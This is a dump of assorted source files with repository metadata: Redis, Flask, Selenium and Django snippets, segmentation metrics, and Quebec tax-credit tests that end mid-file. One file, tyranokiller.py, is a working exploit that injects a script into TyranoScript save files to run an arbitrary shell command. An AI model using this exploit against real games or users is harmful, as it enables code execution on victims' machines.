hexsha
stringlengths 40
40
| size
int64 5
2.06M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
248
| max_stars_repo_name
stringlengths 5
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
248
| max_issues_repo_name
stringlengths 5
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
248
| max_forks_repo_name
stringlengths 5
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 5
2.06M
| avg_line_length
float64 1
1.02M
| max_line_length
int64 3
1.03M
| alphanum_fraction
float64 0
1
| count_classes
int64 0
1.6M
| score_classes
float64 0
1
| count_generators
int64 0
651k
| score_generators
float64 0
1
| count_decorators
int64 0
990k
| score_decorators
float64 0
1
| count_async_functions
int64 0
235k
| score_async_functions
float64 0
1
| count_documentation
int64 0
1.04M
| score_documentation
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
af8eb22a7a8fbb0ab152b78c299a3fc57959c738
| 163
|
py
|
Python
|
79.py
|
tarunbodapati/sum.c
|
c343d6ac530b7f433093138ac52474df4c9c4441
|
[
"MIT"
] | null | null | null |
79.py
|
tarunbodapati/sum.c
|
c343d6ac530b7f433093138ac52474df4c9c4441
|
[
"MIT"
] | null | null | null |
79.py
|
tarunbodapati/sum.c
|
c343d6ac530b7f433093138ac52474df4c9c4441
|
[
"MIT"
] | null | null | null |
x,y=map(int,input().split(" "))
count=0
for i in range(0,1000):
if(x*y==i*i):
count+=1
if(count==1):
print("yes")
else:
print("no")
| 14.818182
| 31
| 0.484663
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 12
| 0.07362
|
af92ace02dba087d489cb1e5f3f4aa495505fa6e
| 654
|
py
|
Python
|
examples/basic_elasticache_password_protected.py
|
rtkefreure/redis-py-cluster
|
f0627c91ce23e8784dbc996078428c9bdbacb20b
|
[
"MIT"
] | 1,075
|
2015-01-01T17:46:25.000Z
|
2022-03-31T17:55:18.000Z
|
examples/basic_elasticache_password_protected.py
|
rtkefreure/redis-py-cluster
|
f0627c91ce23e8784dbc996078428c9bdbacb20b
|
[
"MIT"
] | 397
|
2015-01-04T08:39:03.000Z
|
2022-03-22T01:59:18.000Z
|
examples/basic_elasticache_password_protected.py
|
rtkefreure/redis-py-cluster
|
f0627c91ce23e8784dbc996078428c9bdbacb20b
|
[
"MIT"
] | 373
|
2015-01-13T08:44:40.000Z
|
2022-03-29T02:18:20.000Z
|
from rediscluster import RedisCluster
rc = RedisCluster(
host='clustercfg.cfg-endpoint-name.aq25ta.euw1.cache.amazonaws.com',
port=6379,
password='password_is_protected',
skip_full_coverage_check=True, # Bypass Redis CONFIG call to elasticache
decode_responses=True, # decode_responses must be set to True when used with python3
ssl=True, # in-transit encryption, https://docs.aws.amazon.com/AmazonElastiCache/latest/red-ug/in-transit-encryption.html
ssl_cert_reqs=None # see https://github.com/andymccurdy/redis-py#ssl-connections
)
rc.set("foo", "bar")
print(rc.get("foo"))
| 40.875
| 148
| 0.704893
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 376
| 0.574924
|
af950ed2adf47bfd5bbac8fc2d72461c9405f310
| 1,809
|
py
|
Python
|
lemonspotter/samplers/declare.py
|
martinruefenacht/lemonspotter
|
4e24759aded6536bbb3cdcc311e5eaf72d52c4e3
|
[
"MIT"
] | null | null | null |
lemonspotter/samplers/declare.py
|
martinruefenacht/lemonspotter
|
4e24759aded6536bbb3cdcc311e5eaf72d52c4e3
|
[
"MIT"
] | 20
|
2019-11-14T16:35:42.000Z
|
2021-05-17T14:55:44.000Z
|
lemonspotter/samplers/declare.py
|
martinruefenacht/lemonspotter
|
4e24759aded6536bbb3cdcc311e5eaf72d52c4e3
|
[
"MIT"
] | null | null | null |
"""
This module contains the definition of the DefaultSampler.
"""
import logging
from typing import Iterable
from lemonspotter.core.parameter import Direction
from lemonspotter.core.sampler import Sampler
from lemonspotter.core.variable import Variable
from lemonspotter.core.function import Function
from lemonspotter.core.sample import FunctionSample
class DeclarationSampler(Sampler):
"""
This class implements the DefaultSampler behaviour. It uses the default values from the
specification types to create a single Variable.
"""
def __str__(self) -> str:
return type(self).__name__
def generate_samples(self, function: Function) -> Iterable[FunctionSample]:
"""
"""
logging.debug('DeclarationSampler used for %s', function.name)
def evaluator() -> bool:
raise NotImplementedError('DeclarationSampler only generates compilable ' +
'code, not runnable.')
# generate valid but empty arguments
arguments = []
variables = set()
for parameter in function.parameters: # type: ignore
if parameter.direction == Direction.OUT and parameter.type.dereferencable:
mem_alloc = f'malloc(sizeof({parameter.type.dereference().language_type}))'
variable = Variable(parameter.type, f'arg_{parameter.name}', mem_alloc)
variables.add(variable)
else:
variable = Variable(parameter.type, f'arg_{parameter.name}')
variables.add(variable)
logging.debug('declaring variable argument: %s', variable.name)
arguments.append(variable)
sample = FunctionSample(function, True, variables, arguments, evaluator)
return set([sample])
| 33.5
| 91
| 0.66335
| 1,450
| 0.801548
| 0
| 0
| 0
| 0
| 0
| 0
| 529
| 0.292427
|
af9558754aad314aeb8db737a2091bb0a63f662a
| 480
|
py
|
Python
|
source/python/LSWRC.py
|
JoHyukJun/algorithm-analysis
|
3eda22ce0eeb52490702206d73c04cff1eb3e72d
|
[
"Apache-2.0"
] | null | null | null |
source/python/LSWRC.py
|
JoHyukJun/algorithm-analysis
|
3eda22ce0eeb52490702206d73c04cff1eb3e72d
|
[
"Apache-2.0"
] | null | null | null |
source/python/LSWRC.py
|
JoHyukJun/algorithm-analysis
|
3eda22ce0eeb52490702206d73c04cff1eb3e72d
|
[
"Apache-2.0"
] | null | null | null |
'''
main.py
Created by JO HYUK JUN on 2021
Copyright © 2021 JO HYUK JUN. All rights reserved.
'''
class Solution:
def lengthOfLongestSubstring(self, s: str) -> int:
output = 0
str_set = []
for idx, val in enumerate(s):
if val in str_set:
str_set = str_set[str_set.index(val) + 1:]
str_set.append(val)
output = max(output, len(str_set))
return output
| 21.818182
| 58
| 0.525
| 366
| 0.760915
| 0
| 0
| 0
| 0
| 0
| 0
| 113
| 0.234927
|
af95fa980c5195e3c75aff212645fcf4a36ea392
| 2,532
|
py
|
Python
|
tyranokiller.py
|
satoki/tyranokiller
|
9a4d707ca9f0d2469e9cbd0b57f474b2c96c2d9d
|
[
"MIT"
] | 5
|
2021-12-23T11:23:40.000Z
|
2022-01-01T22:48:18.000Z
|
tyranokiller.py
|
satoki/tyranoscript_vulnerability
|
9a4d707ca9f0d2469e9cbd0b57f474b2c96c2d9d
|
[
"MIT"
] | null | null | null |
tyranokiller.py
|
satoki/tyranoscript_vulnerability
|
9a4d707ca9f0d2469e9cbd0b57f474b2c96c2d9d
|
[
"MIT"
] | null | null | null |
# Exploit Title: TyranoScript 5.13b - Arbitrary Code Execution
# Date: 27/03/2022
# Exploit Author: Satoki
# Vendor Homepage: https://tyrano.jp/
# Software Link: https://github.com/ShikemokuMK/tyranoscript
#
# Version (Save Data ACE):
# TyranoScriptV5 <= 5.04b
# TyranoScript <= 4.83
#
# Version (Development Data ACE):
# TyranoBuilder <= 1.87b
# TyranoBuilderV5 <= 2.03
# TyranoRider <= 2.20
# TyranoStudio <= 1.10d
# (TyranoScriptV5 <= 5.13b)
# (TyranoScript <= 4.88)
#
# Tested on: Windows
# CVE : 0day
#
# GitHub: https://github.com/satoki/tyranoscript_vulnerability
# Usage: python3 tyranokiller.py -c "calc" Test.sav
import os
import sys
import shutil
from argparse import ArgumentParser
argparser = ArgumentParser()
argparser.add_argument("filename", type=str, help="Specify the target sav file name")
argparser.add_argument("-c", "--command", type=str, default="calc", help="Specify the command to be injected")
args = argparser.parse_args()
filename = args.filename
command = args.command
print(f"\033[91m\
-------------------------------------------------------------\n\
| _____ _ _ _ |\n\
| /__ \_ _ _ __ __ _ _ __ ___ /\ /(_) | | ___ _ __ |\n\
| / /\/ | | | '__/ _` | '_ \ / _ \ / //_/ | | |/ _ \ '__| |\n\
| / / | |_| | | | (_| | | | | (_) / __ \| | | | __/ | |\n\
| \/ \__, |_| \__,_|_| |_|\___/\/ \/|_|_|_|\___|_| |\n\
| |___/ |\n\
| v1.1.0|\n\
-------------------------------------------------------------\n\
CVE-XXXX-XXXX\033[0m\n\
Target: {filename}\n\
Command: {command}\n\
------------------------------------------------------------")
if not os.path.isfile(filename):
print("Error: sav file doesn't exist.")
sys.exit(1)
if "\"" in command:
print("Error: Double quotes can't be used in the command.")
sys.exit(1)
shutil.copyfile(filename, f"{filename}.bk")
savfile = open(f"{filename}.bk", mode="r")
data = savfile.read()
savfile.close()
command = command.replace("\\", "\\\\")
code = f"\
alert('Injected_by_TyranoKiller_!!!!');\
require('child_process').exec(`{command}`);\
"
data = data.replace("%3C/div%3E", f"%3C/div%3E%3Cscript%3E{code}%3C/script%3E", 1)
code = code.replace(";", ";\n")
print(f"Code:\n\033[96m{code}\033[0m\
------------------------------------------------------------")
savfile = open(filename, mode="w")
savfile.write(data)
savfile.close()
print("Completed.")
| 30.506024
| 110
| 0.527646
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,847
| 0.729463
|
af97ce7ed6690110d340cf7da5e8b723433180ff
| 526
|
py
|
Python
|
forms.py
|
MarioAer/BubblesData
|
849cc6428b5e8d64f5517f94a714e3f737bfc75d
|
[
"MIT"
] | null | null | null |
forms.py
|
MarioAer/BubblesData
|
849cc6428b5e8d64f5517f94a714e3f737bfc75d
|
[
"MIT"
] | null | null | null |
forms.py
|
MarioAer/BubblesData
|
849cc6428b5e8d64f5517f94a714e3f737bfc75d
|
[
"MIT"
] | null | null | null |
# -*- coding: UTF-8 -*-
"""(forms.py) Flask-Login Example: Login Form"""
from flask_wtf import Form # import from flask_wtf, NOT wtforms
from wtforms import StringField, PasswordField
from wtforms.validators import InputRequired, Length
# Define the LoginRorm class by sub-classing Form
class LoginForm(Form):
# This form contains two fields with validators
name = StringField(u'User Name:', validators=[InputRequired(), Length(max=20)])
passwd = PasswordField(u'Password:', validators=[Length(min=4, max=16)])
| 40.461538
| 83
| 0.741445
| 235
| 0.446768
| 0
| 0
| 0
| 0
| 0
| 0
| 228
| 0.43346
|
af9c8aaccf0095264c9bcfb36a5958fdb4382d26
| 1,322
|
py
|
Python
|
core/loader.py
|
1x-eng/ext-a-cy
|
d6efbabca89243c9c41ce4c130e9f963b2b42229
|
[
"MIT"
] | null | null | null |
core/loader.py
|
1x-eng/ext-a-cy
|
d6efbabca89243c9c41ce4c130e9f963b2b42229
|
[
"MIT"
] | null | null | null |
core/loader.py
|
1x-eng/ext-a-cy
|
d6efbabca89243c9c41ce4c130e9f963b2b42229
|
[
"MIT"
] | null | null | null |
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
__author__='Pruthvi Kumar'
# 30 June 2019.
# pruthvikumar.123@gmail.com
# Load web-page associated with given URL and await given dom element until specified time.
class LoadPage:
def __init__(self, url, dom_id, wait_time=5):
super(LoadPage, self).__init__()
self.url = url
self.dom_id = dom_id
self.wait_time = wait_time
self.driver = webdriver.Chrome()
def extractor(self):
try:
self.driver.get(self.url)
# Wait as long as required, or maximum of 5 sec for element to appear
# If successful, retrieves the element
WebDriverWait(self.driver, self.wait_time).until(EC.presence_of_element_located((By.ID, self.dom_id)))
# If you wanted to do any activity like login etc., conduct that here.
return self.driver.page_source
except TimeoutError:
print("Failed to load page / Failed to wait until {} element was loaded @ "
"{}.".format(self.dom_id, self.url))
finally:
self.driver.quit()
| 33.897436
| 114
| 0.67171
| 910
| 0.688351
| 0
| 0
| 0
| 0
| 0
| 0
| 400
| 0.302572
|
af9cba96e04a6dafd8fe9ffe1a97e239f33fd7e2
| 188
|
py
|
Python
|
improutils/__init__.py
|
ImprolabFIT/improutils
|
84666f88db594dd5d24cf946c635df37643ed309
|
[
"MIT"
] | null | null | null |
improutils/__init__.py
|
ImprolabFIT/improutils
|
84666f88db594dd5d24cf946c635df37643ed309
|
[
"MIT"
] | null | null | null |
improutils/__init__.py
|
ImprolabFIT/improutils
|
84666f88db594dd5d24cf946c635df37643ed309
|
[
"MIT"
] | null | null | null |
from .other import *
from .acquisition import *
from .filtration import *
from .preprocessing import *
from .recognition import *
from .segmentation import *
from .visualisation import *
| 20.888889
| 28
| 0.771277
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
af9cf05604e40321edbad3928cd57491f9b1fcff
| 1,598
|
py
|
Python
|
Classicist Express/api/urls.py
|
RisalatShahriar/ccNews
|
d7b73bff86ac938d47be4f97d04a81af9ed00faf
|
[
"Apache-2.0"
] | null | null | null |
Classicist Express/api/urls.py
|
RisalatShahriar/ccNews
|
d7b73bff86ac938d47be4f97d04a81af9ed00faf
|
[
"Apache-2.0"
] | null | null | null |
Classicist Express/api/urls.py
|
RisalatShahriar/ccNews
|
d7b73bff86ac938d47be4f97d04a81af9ed00faf
|
[
"Apache-2.0"
] | null | null | null |
from django.urls import path
from . import views
urlpatterns = [
path('bd', views.bdaffair, name="bd_api"),
path('home', views.home_data, name='home_api'),
path('cultural', views.cultural_insights, name='cultural_api'),
path('sports', views.sports_insights, name='sports_api'),
path('international', views.internatioal, name='achievements_api'),
path('interview', views.interviews, name='interview_api'),
path('cc', views.cc, name='cc_api'),
path('youth', views.youth, name='youth_api'),
path('district', views.district_insights, name='district_api'),
path('comics', views.comics, name='comics_api'),
path('trending', views.trending, name='trending_api'),
path('diversed', views.diversed, name='diversed_api'),
path('bd/top', views.bdaffair_top, name="top_bd_api"),
path('home/top', views.home_data_top, name='top_home_api'),
path('cultural/top', views.cultural_insights_top, name='top_cultural_api'),
path('sports/top', views.sports_insights_top, name='top_sports_api'),
path('international/top', views.internatioal_top, name='top_achievements_api'),
path('interview/top', views.interviews_top, name='top_interview_api'),
path('cc/top', views.cc_top, name='top_cc_api'),
path('youth/top', views.youth_top, name='top_youth_api'),
path('district/top', views.district_insights_top, name='top_district_api'),
path('comics/top', views.comics_top, name='top_comics_api'),
path('trending/top', views.trending_top, name='top_trending_api'),
path('diversed/top', views.diversed_top, name='top_diversed_api')
]
| 55.103448
| 83
| 0.71214
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 602
| 0.376721
|
af9ec8c3e054bbb041579522842ad9b2da17d23a
| 11,544
|
py
|
Python
|
farmer/ncc/metrics/segmentation_metrics.py
|
aiorhiroki/farmer.tf2
|
5d78f4b47b753ab2d595829c17fef7c6061235b5
|
[
"Apache-2.0"
] | null | null | null |
farmer/ncc/metrics/segmentation_metrics.py
|
aiorhiroki/farmer.tf2
|
5d78f4b47b753ab2d595829c17fef7c6061235b5
|
[
"Apache-2.0"
] | 7
|
2021-11-12T05:58:48.000Z
|
2022-02-25T07:05:26.000Z
|
farmer/ncc/metrics/segmentation_metrics.py
|
aiorhiroki/farmer.tf2
|
5d78f4b47b753ab2d595829c17fef7c6061235b5
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
from pathlib import Path
import itertools
from tqdm import tqdm
from ..utils import get_imageset
import matplotlib.pyplot as plt
import cv2
import json
from ..metrics.surface_dice import metrics as surface_distance
from ..metrics.functional import calc_isolated_fp
def calc_segmentation_metrics(confusion):
tp = np.diag(confusion)
fp = np.sum(confusion, 0) - tp
fn = np.sum(confusion, 1) - tp
tn = np.sum(confusion) - (fp + fn + tp)
iou = calc_iou_from_confusion(tp, fp, fn)
dice = calc_dice_from_confusion(tp, fp, fn)
precision = calc_precision_from_confusion(tp, fp)
recall = calc_recall_from_confusion(tp, fn)
sepecificity = calc_sepecificity_from_confusion(tn, fp)
return {
'iou': iou,
'dice': dice,
'precision': precision,
'recall': recall,
'specificity': sepecificity
}
def iou_dice_val(
nb_classes,
dataset,
model,
batch_size
):
confusion = np.zeros((nb_classes, nb_classes), dtype=np.int32)
print('\nvalidation...')
for i, (image, mask) in enumerate(tqdm(dataset)):
if i == 0:
images = np.zeros((batch_size,) + image.shape, dtype=image.dtype)
masks = np.zeros((batch_size,) + mask.shape, dtype=mask.dtype)
image_index = i % batch_size
images[image_index] = image
masks[image_index] = mask
if i == len(dataset) - 1 or image_index == batch_size - 1:
output = model.predict(images)
for j in range(image_index + 1):
confusion += calc_segmentation_confusion(
output[j], masks[j], nb_classes)
images[:] = 0
masks[:] = 0
return calc_segmentation_metrics(confusion)
def calc_segmentation_confusion(y_pred, y_true, nb_classes):
# Convert predictions and target from categorical to integer format
# y_pred: onehot, y_true: onehot
y_pred = np.argmax(y_pred, axis=-1).ravel()
y_true = np.argmax(y_true, axis=-1).ravel()
x = y_pred + nb_classes * y_true
bincount_2d = np.bincount(
x.astype(np.int32), minlength=nb_classes**2)
assert bincount_2d.size == nb_classes**2
confusion = bincount_2d.reshape((nb_classes, nb_classes))
return confusion
def calc_iou_from_confusion(tp, fp, fn):
with np.errstate(divide='ignore', invalid='ignore'):
iou = tp / (tp + fp + fn)
iou[np.isnan(iou)] = 0
return [float(i) for i in iou]
def calc_dice_from_confusion(tp, fp, fn):
with np.errstate(divide='ignore', invalid='ignore'):
dice = 2 * tp / (2 * tp + fp + fn)
dice[np.isnan(dice)] = 0
return [float(d) for d in dice]
def calc_precision_from_confusion(tp, fp):
with np.errstate(divide='ignore', invalid='ignore'):
precision = tp / (tp + fp)
precision[np.isnan(precision)] = 0
return [float(p) for p in precision]
def calc_recall_from_confusion(tp, fn):
with np.errstate(divide='ignore', invalid='ignore'):
recall = tp / (tp + fn)
recall[np.isnan(recall)] = 0
return [float(r) for r in recall]
def calc_sepecificity_from_confusion(tn, fp):
with np.errstate(divide='ignore', invalid='ignore'):
sepecificity = tn / (fp + tn)
sepecificity[np.isnan(sepecificity)] = 0
return [float(s) for s in sepecificity]
def detection_rate_confusions(pred_labels, gt_labels, nb_classes):
"""
gt_labels: iterable container (Width, Height)
prediction_labels: iterable container (Width, Height)
nb_classes: number of classes
"""
confusion_tabel = np.zeros((nb_classes, 4), dtype=np.uint8)
for gt_label, pred_label in zip(gt_labels, pred_labels):
for class_id in range(nb_classes):
gt_mask = gt_label == class_id
pred_mask = pred_label == class_id
if np.sum(gt_mask) == 0 and np.sum(pred_mask) == 0:
confusion_tabel[class_id, 0] += 1
elif np.sum(gt_mask) == 0 and np.sum(pred_mask) > 0:
confusion_tabel[class_id, 1] += 1
elif np.sum(gt_mask * pred_mask) == 0:
confusion_tabel[class_id, 2] += 1
else:
confusion_tabel[class_id, 3] += 1
return confusion_tabel
def plot_confusion_matrix(cm, classes,
normalize=False,
title='Confusion matrix',
cmap=plt.cm.Blues,
save_file=None):
"""
This function prints and plots the confusion matrix.
Normalization can be applied by setting `normalize=True`.
"""
if normalize:
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
print("Normalized confusion matrix")
else:
print('Confusion matrix, without normalization')
print(cm)
plt.figure()
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation=45)
plt.yticks(tick_marks, classes)
fmt = '.2f' if normalize else 'd'
thresh = cm.max() / 2.
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(j, i, format(cm[i, j], fmt),
horizontalalignment="center",
color="white" if cm[i, j] > thresh else "black")
plt.ylabel('True label')
plt.xlabel('Predicted label')
plt.tight_layout()
plt.savefig('{}.png'.format(save_file))
def calc_surface_dice(pred_out, gt_label, nb_classes, vertical=1.0, horizontal=1.0, tolerance=0.0):
"""
surface dice calculation
Args:
pred_out (np.array, shape (h,w,nb_classes)): prediction output.
gt_mask (np.array, shape (h,w)): ground truth mask.
nb_classes (int): the number of classes
vertical (float, optional): real length (mm) of pixel in the vertical direction. Defaults to 1.0.
horizontal (float, optional): real length (mm) of pixel in the horizontal direction. Defaults to 1.0.
tolerance (float, optional): acceptable tolerance (mm) of boundary. Defaults to 0.0.
Returns:
surface_dice (float):
"""
class_surface_dice = list()
# convert array (value: class_id)
pred_label = np.uint8(np.argmax(pred_out, axis=2))
gt_label = np.uint8(np.argmax(gt_label, axis=2))
for class_id in range(nb_classes):
gt_mask = gt_label == class_id
pred_mask = pred_label == class_id
# convert bool np.array mask
gt_mask = np.asarray(gt_mask, dtype=np.bool)
pred_mask = np.asarray(pred_mask, dtype=np.bool)
surface_distances = surface_distance.compute_surface_distances(
gt_mask,
pred_mask,
spacing_mm=(vertical, horizontal))
surface_dice = surface_distance.compute_surface_dice_at_tolerance(surface_distances, tolerance_mm=tolerance)
class_surface_dice.append(surface_dice)
return class_surface_dice
def calc_weighted_dice(confusion, isolated_fp, nb_classes, isolated_fp_weights=15.0):
"""
weighted dice calculation
Args:
confusion (np.array): confusion matrix.
isolated_fp (np.array): isolated fp for each class.
isolated_fp_weight (dict or float): isolated fp weights for each class. Defaults to 15.0.
Returns:
weighted_dice (np.array)
"""
if isinstance(isolated_fp_weights, float):
isolated_fp_weights = {i: isolated_fp_weights for i in range(nb_classes)}
assert isinstance(isolated_fp_weights, dict)
sorted_weights = sorted(isolated_fp_weights.items(), key=lambda x: x[0])
isolated_fp_weights = np.asarray([v for _, v in sorted_weights])
tp = np.diag(confusion)
connected_fp = np.sum(confusion, 0) - tp - isolated_fp
fn = np.sum(confusion, 1) - tp
class_w_dice = 2 * tp / (2 * tp + fn + connected_fp + isolated_fp_weights * isolated_fp)
return class_w_dice
def generate_segmentation_result(
nb_classes,
dataset,
model,
save_dir,
batch_size,
sdice_tolerance,
isolated_fp_weights
):
confusion_all = np.zeros((nb_classes, nb_classes), dtype=np.int32)
image_dice_list = list()
dice_list = list()
surface_dice_list = list()
isolated_fp_all = np.zeros(nb_classes, dtype=np.int32)
print('\nsave predicted image...')
for i, (image, mask) in enumerate(tqdm(dataset)):
if i == 0:
images = np.zeros((batch_size,) + image.shape, dtype=image.dtype)
masks = np.zeros((batch_size,) + mask.shape, dtype=mask.dtype)
batch_index = i // batch_size
image_index = i % batch_size
images[image_index] = image
masks[image_index] = mask
if i == len(dataset) - 1 or image_index == batch_size - 1:
output = model.predict(images)
for j in range(image_index + 1):
confusion = calc_segmentation_confusion(
output[j], masks[j], nb_classes)
metrics = calc_segmentation_metrics(confusion)
dice = metrics['dice']
surface_dice = calc_surface_dice(output[j], masks[j], nb_classes, tolerance=sdice_tolerance)
isolated_fp = calc_isolated_fp(output[j], masks[j], nb_classes)
weighted_dice = calc_weighted_dice(
confusion, isolated_fp, nb_classes, isolated_fp_weights=isolated_fp_weights)
result_image = get_imageset(
images[j], output[j], masks[j],
put_text = f'dice: {np.round(dice, 3)} ' \
f'surface dice: {np.round(surface_dice, 3)} ' \
f'weighted dice: {np.round(weighted_dice, 3)}')
data_index = batch_index * batch_size + j
*input_file, _ = dataset.annotations[data_index]
image_path = Path(input_file[0])
save_image_dir = Path(save_dir) / image_path.parent.name
save_image_dir.mkdir(exist_ok=True)
save_image_path = str(save_image_dir / image_path.name)
image_dice_list.append([save_image_path, dice])
dice_list.append(dice)
surface_dice_list.append([save_image_path, surface_dice])
result_image_out = result_image[:, :, ::-1] # RGB => BGR
cv2.imwrite(save_image_path, result_image_out)
confusion_all += confusion
isolated_fp_all += isolated_fp
images[:] = 0
masks[:] = 0
with open(f"{save_dir}/dice.json", "w") as fw:
json.dump(image_dice_list, fw, ensure_ascii=True, indent=4)
with open(f"{save_dir}/surface_dice.json", "w") as fw:
json.dump(surface_dice_list, fw, ensure_ascii=True, indent=4)
dice_class_axis = np.array(dice_list).T.tolist()
for i in range(len(dice_class_axis)):
plt.figure()
plt.hist(dice_class_axis[i])
plt.savefig(f"{save_dir}/dice_hist_class_{i}.png")
metrics = calc_segmentation_metrics(confusion_all)
# append surface_dice and weighted_dice to metrics
mean_surface_dice = np.mean(list(map(lambda x: x[1], surface_dice_list)), axis=0)
metrics['surface_dice'] = [float(x) for x in mean_surface_dice]
metrics['weighted_dice'] = calc_weighted_dice(
confusion_all, isolated_fp_all, nb_classes, isolated_fp_weights=isolated_fp_weights)
return metrics
| 34.981818
| 116
| 0.628638
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,988
| 0.172211
|
af9f58fe0e660b08a353e17203614fe5d6b9e0d5
| 46
|
py
|
Python
|
chatbot/__init__.py
|
rdorado79/chatbotlib
|
bfe44593fe218d13a8c55f80f0c13db67605a5b2
|
[
"MIT"
] | null | null | null |
chatbot/__init__.py
|
rdorado79/chatbotlib
|
bfe44593fe218d13a8c55f80f0c13db67605a5b2
|
[
"MIT"
] | null | null | null |
chatbot/__init__.py
|
rdorado79/chatbotlib
|
bfe44593fe218d13a8c55f80f0c13db67605a5b2
|
[
"MIT"
] | null | null | null |
# Example package with a console entry point
| 15.333333
| 44
| 0.782609
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 44
| 0.956522
|
afa04ed205e39049b31fa8fd4108f5232fadca75
| 1,774
|
py
|
Python
|
mrbaviirc/template/actions/action_var.py
|
brianvanderburg2/python-mrbaviirc-template
|
6da213b30580d66fe7231c40bb7bbebb026a0789
|
[
"Apache-2.0"
] | null | null | null |
mrbaviirc/template/actions/action_var.py
|
brianvanderburg2/python-mrbaviirc-template
|
6da213b30580d66fe7231c40bb7bbebb026a0789
|
[
"Apache-2.0"
] | null | null | null |
mrbaviirc/template/actions/action_var.py
|
brianvanderburg2/python-mrbaviirc-template
|
6da213b30580d66fe7231c40bb7bbebb026a0789
|
[
"Apache-2.0"
] | null | null | null |
""" Handler for the var action tag. """
# pylint: disable=too-few-public-methods,too-many-arguments,protected-access,unused-argument
__author__ = "Brian Allen Vanderburg II"
__copyright__ = "Copyright 2016-2019"
__license__ = "Apache License 2.0"
from . import ActionHandler, DefaultActionHandler
from ..nodes import Node, NodeList
from ..renderers import StringRenderer
class VarNode(Node):
""" Capture output into a variable. """
def __init__(self, template, line, var):
""" Initialize. """
Node.__init__(self, template, line)
self.var = var
self.nodes = NodeList()
def render(self, state):
""" Render the results and capture into a variable. """
new_renderer = state.push_renderer()
try:
self.nodes.render(state)
contents = new_renderer.get()
state.set_var(self.var[0], contents, self.var[1])
finally:
state.pop_renderer()
class VarActionHandler(ActionHandler):
""" Handle var """
def handle_action_var(self, line, start, end):
""" Handle var """
var = self.parser.get_token_var(start, end, allow_type=True)
start += 1
self.parser.get_no_more_tokens(start, end)
node = VarNode(self.template, line, var)
self.parser.add_node(node)
self.parser.push_nodestack(node.nodes)
self.parser.push_handler(VarSubHandler(self.parser, self.template))
class VarSubHandler(DefaultActionHandler):
""" Handle items under var """
def handle_action_endvar(self, line, start, end):
""" endvar """
self.parser.get_no_more_tokens(start, end)
self.parser.pop_nodestack()
self.parser.pop_handler()
ACTION_HANDLERS = {"var": VarActionHandler}
| 28.612903
| 92
| 0.653326
| 1,345
| 0.758174
| 0
| 0
| 0
| 0
| 0
| 0
| 397
| 0.223788
|
afa0c7a4dbfb00577736a7f5962a39c917e15a9e
| 1,623
|
py
|
Python
|
tests/test_exp_worker_cred.py
|
RogerEMO/srd
|
40eb8bb02cfd3b1f60ed9eb3e361877fea744cb5
|
[
"MIT"
] | 1
|
2021-11-22T18:15:09.000Z
|
2021-11-22T18:15:09.000Z
|
tests/test_exp_worker_cred.py
|
RogerEMO/srd
|
40eb8bb02cfd3b1f60ed9eb3e361877fea744cb5
|
[
"MIT"
] | 3
|
2021-05-10T18:46:16.000Z
|
2021-06-01T16:51:48.000Z
|
tests/test_exp_worker_cred.py
|
RogerEMO/srd
|
40eb8bb02cfd3b1f60ed9eb3e361877fea744cb5
|
[
"MIT"
] | 1
|
2021-05-05T17:20:06.000Z
|
2021-05-05T17:20:06.000Z
|
import pytest
from math import isclose
import sys
sys.path.append('/Users/pyann/Dropbox (CEDIA)/srd/Model')
import srd
from srd import quebec
# I use https://cffp.recherche.usherbrooke.ca/outils-ressources/guide-mesures-fiscales/credit-impot-prolongation-carriere/
# since they don't seem to adjust for taxable income (lines 37 and 38, grille de calcul),
# we add some non-work income to avoid a reduction
@pytest.mark.parametrize('age, amount', [(59, 0), (60, 1500), (64, 1500),
(65, 1650), (70, 1650)])
def test_age(age, amount):
p = srd.Person(age=age, earn=30e3, othtax=10e3)
hh = srd.Hhold(p, prov='qc')
qc_form = quebec.form(2019)
qc_form.file(hh)
assert isclose(qc_form.get_exp_worker_cred(p), amount, abs_tol=1)
@pytest.mark.parametrize('work_inc, amount', [(5000, 0), (20e3, 1500),
(34610, 1500), (64610, 0), (49610, 750)])
def test_work_inc_63(work_inc, amount):
p = srd.Person(age=63, earn=work_inc, othtax=10e3)
hh = srd.Hhold(p, prov='qc')
qc_form = quebec.form(2019)
qc_form.file(hh)
assert isclose(qc_form.get_exp_worker_cred(p), amount, abs_tol=1)
@pytest.mark.parametrize('work_inc, amount', [(5000, 0), (20e3, 1650),
(34610, 1650), (67610, 0), ((34610+67610)/2, 825)])
def test_work_inc_66(work_inc, amount):
